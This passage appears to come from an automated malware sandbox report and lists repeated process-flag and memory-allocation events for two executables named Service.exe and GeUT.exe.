              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: C90000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 27F0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2550000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: AE0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 25D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 45D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 1870000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 32E0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 3220000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2CC0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2E40000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 4E40000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: FD0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2810000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: FD0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: FA0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2990000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 27D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 880000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2400000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 4400000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2900000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2AE0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2930000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: AF0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2890000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 4890000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2C20000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2E50000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2CA0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: E10000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 28A0000 memory reserve | memory write watch
